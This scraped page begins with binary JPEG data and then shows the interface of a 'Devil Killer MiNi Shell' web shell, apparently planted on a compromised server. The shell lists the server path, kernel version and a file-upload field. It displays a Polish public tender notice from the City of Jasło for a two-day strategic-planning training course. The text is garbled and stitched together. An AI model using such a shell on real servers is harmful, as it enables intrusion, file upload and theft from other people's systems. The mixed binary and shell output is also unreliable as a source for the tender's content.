JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230508/0020469301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usługi szkoleniowej dla kadry kierowniczej w temacie: „Wypracowanie modelu współpracy w zakresie posiadania wiedzy i wspólnego wdrażania działań strategicznych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Jasło</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.jaslo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://um.jaslo.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usługi szkoleniowej dla kadry kierowniczej w temacie: „Wypracowanie modelu współpracy w zakresie posiadania wiedzy i wspólnego wdrażania działań strategicznych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-841d8ac6-ed6d-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00204693</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00053096/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.29 Szkolenie z zakresu planowania strategicznego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://um-jaslo.logintrade.net/zapytania_email,127113,4177dbbdd75f6a20a5e248af83e34818.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://um-jaslo.logintrade.net/rejestracja/rejestracja.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	Środkiem komunikacji elektronicznej, służącym złożeniu oferty, wymianie informacji oraz przekazywaniem dokumentów lub oświadczeń przez Wykonawcę, jest ich prawidłowe złożenie na Platformie dostępnej pod adresem https://um-jaslo.logintrade.net/rejestracja/rejestracja.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>3.	Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Miasta Jasła: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. <br/>4.	Osoby uprawnione do porozumiewania się z wykonawcami: Sławomir Maćkoś.<br/>5.	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Miasta Jasła<br/>Dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	zainstalowana wtyczka flash - flash player - dotyczy kupca<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – Ajar<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>•	dla Windows Vista: Internet Explorer 8, Internet Explorer 9<br/>•	dla Windows 7: Internet Explorer 9, Internet Explorer 11<br/>•	dla Windows 8: Internet Explorer 11<br/>•	dla Windows 10: Internet Explorer 11<br/>Wspierane są rozwiązania dostarczane przez firmy:<br/>•	Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>•	Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>•	Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A.<br/>•	Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Enigma SOI.<br/>Dopuszczalne formaty przesyłanych danych:<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FE.042.15.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi szkoleniowej dla kadry kierowniczej polegającej na zorganizowaniu i przeprowadzeniu szkolenia wyjazdowego dla 60 osób /pracowników Urzędu Miasta w Jaśle (Zamawiającego) i jego jednostek podległych oraz pracowników innych instytucji/ w temacie: „Wypracowanie modelu współpracy w zakresie posiadania wiedzy i wspólnego wdrażania działań strategicznych” polegających na zwiększeniu świadomości priorytetów rozwojowych miasta, zwiększeniu skuteczności wdrażania planów strategicznych, nabyciu umiejętności eliminowania dublujących się zadań przez różne podmioty, zwiększeniu efektywności wydawania środków publicznych poprzez przybliżenie priorytetów, planowanie i/lub realizację zadań, które ze sobą kolidują. <br/>I.	Główne bloki tematyczne i zagadnienia, które będą przedmiotem omówienia na szkoleniu: <br/>1.	Podstawowy zasób definicji: czym jest strategia, planowanie strategiczne, zarządzanie strategiczne; jak myśleć w kategoriach strategicznych? rozumieć i świadomie wdrażać strategię rozwoju swojej jednostki? Po co strategia UM?<br/>2.	Rola zarządzania strategicznego;<br/>3.	Elementy zarządzania strategicznego;<br/>4.	Planowanie strategiczne w zarządzaniu miastem;<br/>5.	Funkcje strategii w rozwoju miasta;<br/>6.	Cechy dobrej strategii;<br/>7.	Zasady i podejścia w procesie tworzenia dokumentów strategicznych;<br/>8.	Partycypacyjny proces tworzenia strategii: z kim tworzymy? Proces pracy i współpracy, włączanie mieszkańców w procesy strategiczne;<br/>9.	Metody włączania interesariuszy;<br/>10.	Poznanie wybranych narzędzi analizy strategicznej (od analizy zasobów, diagnozę po ocenę sytuacji istniejącej);<br/>11.	Formułowanie misji i wizji;<br/>12.	Wyznaczanie celów strategicznych; podejście scenariuszowe; <br/>13.	Dostosowanie horyzontu czasowego;<br/>14.	Tworzenie planów strategicznych, czyli jak dojść do celu? – opracowanie głównych elementów planu strategicznego w odniesieniu do celu strategicznego w tym określenie planu strategicznego dla swojego działu/funkcji/obszaru, spójnego ze strategią rozwoju UM;<br/>15.	Jak przełożyć strategię na działania operacyjne- czyli jak wdrożyć strategię? określenie zadań do wdrożenia w swoim dziale/funkcji/obszarze;<br/>16.	Ocena ryzyka i trudności związanych z realizacją przedsięwzięć (w tym trudności w zarządzaniem ludźmi w okresie wdrożenia);<br/>17.	Zarządzanie strategiczne oparte na danych, jak dobierać mierniki i wskaźniki rezultatu;<br/>18.	Monitoring.<br/>II.	Założenia dotyczące zakresu realizacji usługi szkoleniowej: <br/>1.	Liczba uczestników szkolenia: 60 osób (pracownicy Zamawiającego i jego jednostek podległych oraz pracowników innych instytucji), pięć grup szkoleniowych po 12 osób. <br/>2.	Czas trwania szkolenia:<br/>2 dni szkolenia w formie wykładu, w dwa następujące po sobie kolejno dni robocze (od wtorku do piątku), łącznie 16 godz. dydaktycznych po 45 min. Pierwszy dzień: 4 godz. dydakt. wykład ogólny dla wszystkich uczestników oraz 4 godz. dydakt. zajęć warsztatowych w grupach; Drugi dzień: 4 godz. dydakt. zajęć warsztatowych w grupach oraz 4 godz. dydakt. zajęć w grupie łączonej. <br/>3.	Miejsce szkolenia (lokalizacja i standard): poza Jasłem, tj. od 50 km do 150 km od granic administracyjnych miasta Jasła, hotel lub centrum konferencyjno-szkoleniowe o standardzie odpowiadającym co najmniej 4 gwiazdkom, posiadające salę szkoleniową i restaurację. <br/>4.	Zamawiający wymaga, aby zamówienie było zrealizowane w całości w terminie do 30.06.2022 r.<br/>5.	Dokładny termin realizacji szkolenia zostanie ustalony przez Strony przed zawarciem umowy. <br/>III.	Sposób przeprowadzenia panelu szkoleniowego:<br/>1.	podział pracowników na grupy według następującej zasady: 6 pracowników UM Jasło + 5 pracowników jednostek podległych + 1 pracownik innej instytucji, <br/>2.	grypy pracują równolegle,<br/>3.	dobór metodologii i narzędzi warsztatowych powinien być ciekawy i zachęcający do aktywnego udziału w szkoleniu,<br/>4.	uczestnicy powinni otrzymać podstawowy zasób wiedzy, szereg dobrych przykładów, metodologia warsztatów nie powinna opierać się tylko na ciągłej interakcji i „wypracowaniu” zagadnień przez uczestników. Trzeba zwrócić uwagę na - jak zrobić? jak się porozumiewać? Jakie podejście jest słuszne? <br/>IV.	Program szkoleń:<br/>Program szkoleń powinien mieć praktyczny charakter i uwzględniać konkretne cele: <br/>1.	poprawa efektywności organizacji poprzez lepszą współpracę i większą synergię działań kadry zarządzającej,<br/>2.	poprawa planowania i priorytetyzacja celów,<br/>3.	wprowadzanie do strategii rozwoju elementów prospołecznych nakierowanych na poprawę efektywności działań,<br/>4.	poprawa świadomości w zakresie myślenia strategicznego,<br/>5.	umiejętność tworzenia podstawowych planów strategicznych JST,<br/>6.	umiejętność szeregowania celów,<br/>7.	umiejętność budowania karty realizacji projektu/przedsięwzięcia z działaniami wdrożeniowymi i wskaźnikami rezultatu,<br/>8.	przeanalizowanie konkretnych przykładów produktów i wyzwań,<br/>9.	próba wdrożenia strategii rozwoju UM i rozwiązania konkretnego problemu w zakresie programów kluczowych. Na podstawie Strategii Rozwoju Miasta Jasła na lata 2021-2030 trenerzy rozdzielą na wątki opracowanie oraz przygotują ćwiczenia grupowe, które będą realizowane podczas warsztatów.<br/><br/><br/>I.	Wykonawca będzie zobowiązany do:<br/><br/>1.	Opracowania harmonogramu szkolenia. <br/>1) Wykonawca przed zawarciem umowy przedstawi Zamawiającemu harmonogram szkolenia. <br/>2) Harmonogram szkolenia wymaga akceptacji Zamawiającego. Dopuszcza się zmianę harmonogramu ze strony Wykonawcy, lecz nie później niż na 10 dni roboczych przed zaplanowanym warsztatem.<br/>2.	Opracowania programu szkolenia. <br/>1) Wykonawca przedstawi program szkolenia do akceptacji Zamawiającemu minimum 5 dni roboczych przed szkoleniem. <br/>2) Program szkolenia wymaga akceptacji Zamawiającego. <br/>3) szkolenie odbywać się będzie w formie zajęć praktycznych oraz teoretycznych zgodnie z zakresem tematycznym wskazanym w opisie przedmiotu zamówienia.<br/>3.	Wykonawca przed zawarciem umowy przedstawi Zamawiającemu do wyboru co najmniej 3 propozycje miejsca szkolenia (lokalizacje hotelu lub centrum konferencyjno - hotelowego).<br/>I.	Pozostałe założenia dotyczące przeprowadzenia szkolenia:<br/>1.	Materiały szkoleniowe: <br/>1)	Zapewnienie każdemu uczestnikowi szkolenia materiałów szkoleniowych: długopis, notatnik, komplet materiałów zawierających treści poruszane na szkoleniu,<br/>2)	Zapewnienie dostępu do wszystkich materiałów w wersji elektronicznej z możliwością wydruku oraz oznaczenie materiałów zgodnie z wymogami projektu,<br/>3)	Zapewnienie komunikacji on-line oraz dostępu do materiałów elektronicznych w sposób uwzględniający możliwości techniczne Zamawiającego, bez ponoszenia przez niego dodatkowych kosztów,<br/>4)	Sporządzenie i prowadzenie listy obecności osób skierowanych na szkolenie,<br/>5)	Przygotowanie i dostarczenie Zamawiającemu zaświadczeń o ukończeniu szkolenia dla wszystkich jego uczestników. Zaświadczenia muszą być sporządzone w formie pisemnej, tj. podpisane podpisem własnoręcznym Wykonawcy lub trenera,<br/>6)	Umieszczenia na materiałach wytworzonych w trakcie realizacji przedmiotu zamówienia (szkolenia) – listach obecności i zaświadczeniach dla uczestników szkolenia – logotypu Funduszy Norweskich i EOG, a także informacji o współfinansowaniu szkolenia ze środków funduszy EOG i funduszy norweskich, w formie zapisu: Szkolenie współfinansowane ze środków Mechanizmu Finansowego EOG 2014-2021 oraz budżetu państwa oraz hasła - na dole w stopce: Wspólnie działamy na rzecz Europy zielonej, konkurencyjnej i sprzyjającej integracji społecznej. Użyte logotypy i sformułowania muszą być zgodne z Podręcznikiem „Komunikacja i identyfikacja wizualna. Fundusze Norweskie i EOG 2014-2021”<br/>2.	Usługa transportowa i noclegowa:<br/>1)	Zapewnienie przez Wykonawcę transportu uczestników z Jasła (z punktu wskazanego przez Zamawiającego) na miejsce szkolenia i powrót po szkoleniu do Jasła,<br/>2)	Podmiot świadczący usługę transportu o której mowa w pkt 1) musi posiadać licencję na wykonywanie krajowego transportu drogowego osób, a przewóz musi być dokonany sprawnym pojazdem posiadającym aktualne badania techniczne oraz niezbędne w zakresie bezpieczeństwa wyposażenie i kierowanym przez osobę posiadającą doświadczenie w świadczeniu usług przewozów drogowych pasażerskich, komplet ważnych dokumentów uprawniających do wykonywania takich przewozów, a w trakcie realizacji usługi transportu być w stanie pełnej sprawności psychofizycznej,<br/>3)	Zapewnienie przez Wykonawcę wszystkim uczestnikom szkolenia 1 noclegu. Miejsca noclegowe muszą spełniać następujące kryteria:<br/>a)	nocleg powinien zostać zapewniony na terenie obiektu, w którym będzie zorganizowane szkolenie,<br/>b)	miejsce noclegu ma być zapewnione w pokojach z pełnym węzłem sanitarnym w następującej ilości:<br/><br/>25 pokoi 2 – osobowych i 10 pokoi 1 - osobowych<br/>3.	Usługa wynajmu sali szkoleniowej wraz z wyposażeniem: <br/>Zapewnienie sali szkoleniowej mieszczącej się w hotelu lub centrum konferencyjno- szkoleniowym o standardzie odpowiadającym co najmniej 4 gwiazdkom według poniższych założeń:<br/>a)	obiekt nie może być w trakcie prac remontowych,<br/>b)	sala szkoleniowa musi być wyposażona w odpowiedni sprzęt, niezbędny do realizacji przedmiotu zamówienia, przy czym zajęcia muszą odbywać się w pomieszczeniu, gdzie zapewnione są właściwe warunki BHP i ppoż. oraz zaplecze socjalne, w tym dostęp do WC zaopatrzonego w środki higieniczne, <br/>c)	sala szkoleniowa powinna być dostępna na wyłączność Zamawiającego przez dwa dni szkolenia zgodnie z harmonogramem szkolenia. Obok wskazanej sali nie powinno równocześnie odbywać się inne grupowe wydarzenie, tak żeby zapewnić komfort pracy dla uczestników szkolenia, <br/>d)	sala powinna posiadać okna, być przestronna, odpowiednio oświetlona, wentylowana i klimatyzowana, wyposażona co najmniej w tablicę suchościeralną i tablicę flipchart, rzutnik i ekran do prezentacji multimedialnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe materiały</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna ten warunek za spełniony jeżeli wykonawcy wykażą, że:<br/>	wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie co najmniej jedną usługę polegającą na przeprowadzeniu szkolenia o tematyce zbliżonej do przedmiotem zamówienia o wartości co najmniej 100 000,00 zł brutto, <br/><br/>	dysponują co najmniej 5 osobami posiadającymi wykształcenie wyższe oraz które przeprowadziły co najmniej 3 szkolenia z zakresu planowania strategicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do 